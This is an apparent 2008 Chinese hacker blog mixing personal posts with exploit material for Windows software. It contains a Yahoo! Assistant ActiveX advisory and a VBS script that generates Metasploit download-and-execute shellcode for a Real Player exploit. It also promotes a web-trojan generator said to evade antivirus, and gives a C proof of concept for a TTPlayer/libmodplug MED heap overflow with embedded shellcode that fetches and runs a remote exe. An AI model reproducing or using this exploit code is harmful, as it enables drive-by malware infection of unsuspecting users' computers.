心诺的地盘

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

2008-05-07T15:49:37+08:00

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)

Overview:
Yahoo!助手(原3721网络助手),是一个IE下的BHO (Browser Helper Object).

Yahoo!助手有许多功能,例如IE设置修复,安全防护,删除浏览的历史信息,拦截广告,等等.
更多信息,请参考
http://cn.zs.yahoo.com/

细节:

漏洞存在于ynotifier.dll这个ActiveX控件.
成功利用此漏洞可以使得攻击者能够在安装了Yahoo!助手的电脑上执行任意代码.
成功利用此漏洞需要诱使用户访问特定网页.

在通过IE初始化Ynoifier COM对象时,会出现一个可利用的内存破坏漏洞.

(c78.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e85328 ebx=001ada20 ecx=4080624c edx=00128474 esi=020cb5f0 edi=00000000
eip=43f50743 esp=001283e0 ebp=00128478 iopl=0         nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000             efl=00010246
43f50743 ??               ???

637a8b47 8b45f8           mov     eax,[ebp-0×8]
637a8b4a 8b08             mov     ecx,[eax]
637a8b4c 8d55fc           lea     edx,[ebp-0×4]
637a8b4f 52               push    edx
637a8b50 6a01             push    0×1
637a8b52 50               push    eax
637a8b53 ff5158           call    dword ptr [ecx+0×58] ; ds:0023:408062a4=43f50743

此处虚函数指向了一个无效的数据.

利用堆填充技术,攻击者可以通过利用此漏洞执行任意代码.

Proof of Concept:
只需要下面这行代码保存成HTML文件,即可触发漏洞

Workaround:
对此ActiveX设置一个Killbit.

厂商回应:

2008.04.23 通过邮件通知厂商
2008.04.23 厂商回复,开发补丁
2008.04.23 补丁开发完毕,但厂商希望能够推迟公布细节,因为厂商需要时间推送补丁
2008.05.06 发布公告.(厂商没有发布任何公告)

这一代的领导人不错！

2008-04-14T02:44:29+08:00

刚才在163上看到http://news.163.com/08/0413/17/49E62LT30001124J.html

发现这一代的领导人不错。做了很多实质性的工作。

但从农民免税，就从来没有，而且还种地还给钱。到农民都有医保卡。

国家领导人真正的为老百姓干了很多事。

我记得很清楚就是年30晚上，国家几个领导人还在灾区慰问受灾的人民。

堂堂国家主席，国家总理。能做到这点确实不容易了。

从部队加薪，到给大学生补助。不管多少钱，但是真正的干了很多实在的看得见的事。

还有很多地方很多领域，改动很大。不主张口号，而是真正的在为百姓着想。

特此发帖表扬！

一客户,给卡巴提出的培训内容。

2008-04-11T10:50:03+08:00

老大给看了后，发现这个不是培训卡巴相关知识的，而有点像一黑客培训班内容。

要命了。呵呵！

序号    内容要求
1    磁盘架构分析，分析WYX病毒
2    一般病毒手工处理方式
3    病毒存储架构源码分析
4    引导区病毒分析，代码检测、处理方式及工具介绍
5    文件型病毒分析、宏病毒的手工清楚方法及工具介绍
6    蠕虫病毒介绍、分析、处理方法及工具介绍
7    脚本病毒及网页病毒预防、介绍、代码分析、典型病毒分析：例如欢乐时光病毒介绍分析及工具介绍
8    木马类病毒介绍、代码分析、处理方法及工具介绍
9    ROOTKIT木马原理、检测技术及工具介绍
10    网页病毒发现、分析及提取工具介绍
11    网络钓鱼病毒发现、提取、分析、处理及工具介绍
12    即时通讯病毒发现、提取、分析、处理及工具介绍
13    操作系统漏洞攻击病毒分析、处理方式及工具介绍
14    用常见反病毒技术（比较法、启发式、虚拟机处理病毒）等技术分析、发现、处理病毒及工具介绍
15    计算机病毒诊断技术原理、流行反病毒技术及发展趋势
16    病毒制作方法及过程
17    手工处理病毒的方法、工具及典型病毒实例处理

今天老婆大人的生日，发帖庆祝下！

2008-04-09T21:51:48+08:00

今天老婆的生日，发帖庆祝下！

中国信息安全同盟对外开放！

2008-04-09T12:10:17+08:00

中国信息安全同盟对外开放，招收版主中。。。

url:http://www.hacksafe.org

Real Player rmoc3260.dll Exp

2008-04-05T11:05:13+08:00

'以下代码保存成vbs，双击即可

On Error Resume Next
Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )
url = "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso=Nothing

wscript.echo Chr(13)&"ok，生成a.txt，请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"

该文件只允许会员下载! 登录 | 注册

公布一个REAL11的网页木马生成器

2008-04-03T10:35:01+08:00

这个版本的REAL关IE。而且只对REAL PLAY11有效，请点击下边的连接下载测试软件
http://www.skycn.com/soft/1760.html

怎么用我就不多说了，那些怀疑有病毒或者怀疑有后门的，您可千万别用。别一边自己偷摸用，一边张口大骂心诺写软件加后门！其目的不用想谁也知道！！

现在生成出来的，过4月3号，瑞星和卡巴的最新病毒库！

更新了shellcode，不卡！重写了网马的代码。执行速度更快。如果不公开，可以免杀N长时间！

喜欢的哥们拿去玩吧，有问题可以在这里给我留言。

写这个程序用了二十分钟，找这个图片用了两个半小时！汗！！！

此作品仅供技术交流用，请勿用于非法或者破坏他人计算机，否则后果自负！

解压密码：blog.hacksafe.org

该文件只允许会员下载! 登录 | 注册

千千静听 med 文件格式堆溢出的成功利用

2008-04-01T10:22:39+08:00

PS：一场血腥又要来到！！

By dummy

上个月看的洞，昨天晚上又重新翻看了一下这个洞，终于看到了成功利用的可能性。
远程和本地攻击最后都可以，本地攻击成功比较低一些，头疼。
详细的利用代码不贴了，详细可以看看 libmod 的源码

下面是远程部分 poc, 2个关键 DWORD 值隐藏了.

代码:
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);

千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中，没有检查
文件描述的长度，如果传递一个恶意构造的值，将导致堆溢出。
现在采用libmod 软件很多，都应该存在此问题。

*/

/*
author: dummy
e-mail: dummyz@126.com

date: 2008/02/25
*/

#include
#include

#pragma pack(1)

typedef struct tagMEDMODULEHEADER
{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;

typedef struct tagMMD0SAMPLE
{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;

// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;

typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;

#pragma pack()

// Byte swapping functions from the GNU C Library and libsdl

/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) \
(__extension__ \
({ unsigned short int __bsx = (x); \
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif

/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) \
(__extension__ \
({ unsigned int __bsx = (x); \
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | \
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif

#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif

#define FILE_SIZE_ 0x30000
// 远程攻击
#if 0
// 成功率很低
#define NOP_ "\"%u090aऊ\""
#define HEAP_ADDR_ 码
#else
// 成功率很高
#define NOP_ "\"邐邐\""
#define HEAP_ADDR_ 码

#endif

const unsigned char shellcode[174] =
{
// 必须是偶数大小
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
""
""
"";

void make_med_file(const char* path)
{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;

memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));

p = 0;

mmh.id = 0x30444D4D; // version = '0'

p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p);

p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p);

p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);

file = fopen(path, "wb+");
if ( file == NULL )
{
printf("create file failed!\n");
exit(0);
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);

while ( ftell(file) < FILE_SIZE_ )
{
fwrite(HEAP_ADDR_, 1, 4, file);
}

fclose(file);
printf("successed!\n");
}
}

void make_htlm_file(const char* htmlpath, const char* s3mpath, const char* url)
{
FILE *file = fopen(htmlpath, "w+");
if ( file == NULL )
{
printf("create '%s' failed!\n", htmlpath);
exit(0);
}

fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);

const unsigned l = strlen(url);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , url[j + 1], url[j]);

fprintf(file, "%s%s%s", script2, s3mpath, script3);
fclose(file);

printf("make '%s' successed!\n", htmlpath);
}

int main(int argc, char* argv[])
{
printf("ttplayer stack exp poc by dummyz@126.com\n");
if ( argc <= 1 )
{
printf("need argv!(ex: %s http://xxx.xxx/xx.exe\n", argv[0]);
return -1;
}

printf("+ make_med_file...\n");
make_med_file("c:\\shit.s3m");

printf("+ make_htlm_file...\n");
make_htlm_file("poc.html", "c://shit.s3m", argv[1]);

printf("done.\n");

return 0;
}

BLOG已关闭注册！删除掉从注册起从未登陆的ID!

2008-04-01T01:30:00+08:00

4月2号，删除掉自从注册但是从来没登陆过的ID！

---------------------------------------------------------------------------------------------------

BLOG于四月一日关闭注册！当时为了庆祝自己的生日开发了一个月，95名朋友支持。

希望有ID的朋友经常登陆，因为我从明天起，会清理掉2周不登陆的用户！

有问题可以直接在BLOG处留言，并留下你的联系方式，我会主动和你联系！

---------------------------------------------------------------------------------------------------

BLOG已关闭注册！禁止了游客发表评论！

----------------------------------------------------------------------------------------------------

因为空间是我购买的，每个月都有2G流量限制。

现在几乎每个月都不够了，每到月底BLOG都访问不了。

现在论坛开放下注册2周后关闭，以后所有下载的附件统统会员才能下载！

如果你经常来我BLOG。请先注册下！